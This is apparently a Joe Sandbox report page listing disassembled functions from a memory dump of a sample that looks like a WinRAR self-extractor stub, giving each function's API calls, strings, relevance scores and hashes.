Opcode Fuzzy Hash: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
Instruction Fuzzy Hash: 3C4127B1408346AFC350DF65C88496BFBF8FB88714F004E2EF59692650E778E588CB62

Function 007FEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007FF5A2,?,00000000,?,00000000,00000000), ref: 007FEE6F
__fassign.LIBCMT ref: 007FEEEA
__fassign.LIBCMT ref: 007FEF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007FEF2B
WriteFile.KERNEL32(?,?,00000000,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF4A
WriteFile.KERNEL32(?,?,00000001,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF83

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
Instruction ID: 1aa3a7a2fbdce92cee0a3d073c13648e20464d3e4fa865131ba0b14ae448ba96
Opcode Fuzzy Hash: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
Instruction Fuzzy Hash: 77519171A002499FDB10CFA8D845AFEBBF9FF09310F24451AEA55E73A1E7749A41CB60

Function 007EC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 007EC54A
_swprintf.LIBCMT ref: 007EC57E

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

SetDlgItemTextW.USER32(?,00000066,0081946A), ref: 007EC59E
_wcschr.LIBVCRUNTIME ref: 007EC5D1
EndDialog.USER32(?,00000001), ref: 007EC6B2

Strings

%s%s%u, xrefs: 007EC573

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
Instruction ID: 6a61016996057de8e24358c0509680a7a96d2b3d5763af714a7ec170c4dbe9d1
Opcode Fuzzy Hash: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
Instruction Fuzzy Hash: DA41C075D00658EADB26DBA1DC49EEA77BCFF08301F0080A2E509E61A0E7799BC5CB51

Function 007E9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 007E964E
GetWindowRect.USER32(?,00000000), ref: 007E9693
ShowWindow.USER32(?,00000005,00000000), ref: 007E972A
SetWindowTextW.USER32(?,00000000), ref: 007E9732
ShowWindow.USER32(00000000,00000005), ref: 007E9748

Strings

RarHtmlClassName, xrefs: 007E96F4

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
Instruction ID: 21ce83feca6f74afaf3e4adc1d61aa8f66964d9acb964f1f2ff6f62b1000bad7
Opcode Fuzzy Hash: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
Instruction Fuzzy Hash: A531AE32005254EFCB119F65DD4CB6F7BA8FF88711F004959FE499A262DB38E948CB61

Function 007FBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007FBF79: _free.LIBCMT ref: 007FBFA2

_free.LIBCMT ref: 007FC003

Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506

_free.LIBCMT ref: 007FC00E
_free.LIBCMT ref: 007FC019
_free.LIBCMT ref: 007FC06D
_free.LIBCMT ref: 007FC078
_free.LIBCMT ref: 007FC083
_free.LIBCMT ref: 007FC08E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 49788e69e311e2691ccfb5f821a16bea5decc9edbdba77fd9e1eb334483f7a00
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: EB113D72550B0DFAD660BBB0CC0BFEBB7DD7F00700F408855B39966652DB69F9048A91

Function 007F20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007F20C1,007EFB12), ref: 007F20D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F20E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F20FF
SetLastError.KERNEL32(00000000,?,007F20C1,007EFB12), ref: 007F2151

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
Instruction ID: a3991e97ba63e03eadf51ab86fb13d4a44f1b8b2e59e1bebee2e77b8ecc5f05a
Opcode Fuzzy Hash: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
Instruction Fuzzy Hash: E701883210D71DAEF7946BB5BC895372A48FF217747210B29F320553E2FF5A4C069148

Function 007EDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 007EDCC9
KERNEL32.DLL, xrefs: 007EDCB4
ReleaseSRWLockExclusive, xrefs: 007EDCD9

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
Instruction ID: 1ca08d5c079f26b1f85a3748cc4f95f173ecbceb522482788647eca28d8f8a9e
Opcode Fuzzy Hash: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
Instruction Fuzzy Hash: D7012661343B625F8FB05F765C902E61398FB89392330252AE541D3350DA99CC42DAB0

Function 007E0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D0D

Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A

LocalFileTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007E0D56
SystemTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D72

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
Instruction ID: 90485e1b606c641eaf247fe32a040a72494fe6b35342c4a7addb0682251dafe8
Opcode Fuzzy Hash: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
Instruction Fuzzy Hash: 7D31E97A90024AEBCB10DFE5C8859EFBBBCFF58700B04456AE955E3610E7349685CB64

Function 007E91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 007E91D4
_memcmp.LIBVCRUNTIME ref: 007E91EB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
Instruction ID: 12b59da4de65c9a947f552636804386589f22faa93fee948e89820191c0c35b1
Opcode Fuzzy Hash: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
Instruction Fuzzy Hash: 2921B27360124EBBDB049E12CC81E7BB7ADFB59784B148128FE09DB345E278ED5186A0

Function 007F8FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
_free.LIBCMT ref: 007F8FDC
_free.LIBCMT ref: 007F9004
SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9011
SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
_abort.LIBCMT ref: 007F9023

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
Instruction ID: e72f784443388db63a3126a6f82fe8e6a65ce3a924544f0dadbdcea4b72ea98e
Opcode Fuzzy Hash: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
Instruction Fuzzy Hash: DAF0F436505A09EBC7E133246C0EB3B295AABD1770F240114F724D2392EE2C89025416

Function 007ED2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007ED30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007ED31D
TranslateMessage.USER32(?), ref: 007ED327
DispatchMessageW.USER32(?), ref: 007ED331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED33C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 5430a53c7a7932a029180c17bb3b27477ea578cab04cf35e42d393d4c781c07b
Instruction ID: 320d21c6393994b79cbdb6b5fbf1ca56afb0c5eb9b6d6ad0eacc468129d26021
Opcode Fuzzy Hash: 5430a53c7a7932a029180c17bb3b27477ea578cab04cf35e42d393d4c781c07b
Instruction Fuzzy Hash: 0FF03C72A02519ABCB206BA2DC4CEDBBF6DFF96391F008412F606D2010D6388945CBA1

Function 007EC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 007EC435

Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2

Strings

MIN, xrefs: 007EC4A3
<, xrefs: 007EC41E
HIDE, xrefs: 007EC474
MAX, xrefs: 007EC487

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 432cde1fea814ffe382b128f79fd4047c004b06d89ee2fab21e045d8ccc55e63
Instruction ID: df32b045ab1ce0ff8be6731e0bd763cf0389222fd1710a8e38318d8f250bcb88
Opcode Fuzzy Hash: 432cde1fea814ffe382b128f79fd4047c004b06d89ee2fab21e045d8ccc55e63
Instruction Fuzzy Hash: 1331967690128DAADF26DA56CC45EEF77BCEB19700F004066FA05D6190EBB89FC5CA50

Function 007EADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 007EADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 007EAE22
DeleteObject.GDI32(00000000), ref: 007EAE54
DeleteObject.GDI32(00000000), ref: 007EAE77

Part of subcall function 007E9E1C: FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
Part of subcall function 007E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
Part of subcall function 007E9E1C: LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
Part of subcall function 007E9E1C: LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64

Strings

], xrefs: 007EAE2A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: a512763a23251290438f05ff499f449fa77478ee25db4951833dab1ad9142d4d
Instruction ID: c08ed9ffc8f7ff452577c713b0d0edceed1e11639f8c478c055a0cdd2f61f8a1
Opcode Fuzzy Hash: a512763a23251290438f05ff499f449fa77478ee25db4951833dab1ad9142d4d
Instruction Fuzzy Hash: F00126335426A5F7C710A7669C1BABF7B79AFC9B41F080014FE00A7291DB398C1586B1

Function 007ECC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

EndDialog.USER32(?,00000001), ref: 007ECCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007ECCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 007ECD05
SetDlgItemTextW.USER32(?,00000068), ref: 007ECD14

Strings

RENAMEDLG, xrefs: 007ECCA8

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: dc977c5e3a5354f143f0d918298d10908074077820c36b9b4beec4a47c22b622
Instruction ID: def07a5466a7479fbbc382aa11a3c8caea29340420a9c92f18f5ad125a87909d
Opcode Fuzzy Hash: dc977c5e3a5354f143f0d918298d10908074077820c36b9b4beec4a47c22b622
Instruction Fuzzy Hash: 3A012832386350BAD1229F659D09FAB3B6CFB9E742F204411F345A21E0C66AA9168B75

Function 007F75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F75E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F75F5
FreeLibrary.KERNEL32(00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F7618

Strings

CorExitProcess, xrefs: 007F75ED
mscoree.dll, xrefs: 007F75DB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5517d1792a7c8690e3a871e7c5b98a2859e70b7c157f7fe5b375047ab56d3f71
Instruction ID: a7eff8e53f208c0088268a496a489d1cdd1f188418c3f98371fa38ab2df6513e
Opcode Fuzzy Hash: 5517d1792a7c8690e3a871e7c5b98a2859e70b7c157f7fe5b375047ab56d3f71
Instruction Fuzzy Hash: 62F0313060961DBBDB559B55DC09AAEBBB9FF04712F104058F805E2260DF788A40CA54

Function 007DEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2

Strings

CryptProtectMemory, xrefs: 007DEB8C
Crypt32.dll, xrefs: 007DEB7C
CryptUnprotectMemory, xrefs: 007DEB98

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: be9745f881d4101f5a6f4e6a523cdc7c2c51763e720d4fb81f4c9565982cbeb5
Instruction ID: a45557ffd764026e721244ba2cd92b9bfa82457b9ce2a0de27d23a329d06e303
Opcode Fuzzy Hash: be9745f881d4101f5a6f4e6a523cdc7c2c51763e720d4fb81f4c9565982cbeb5
Instruction Fuzzy Hash: 79E04F70401741AEDB629F399D08B42BEE8BF15704F00881EE4E6D7380D6F8D5808B60

Function 007F7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007F7E4B
_free.LIBCMT ref: 007F7E6B

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

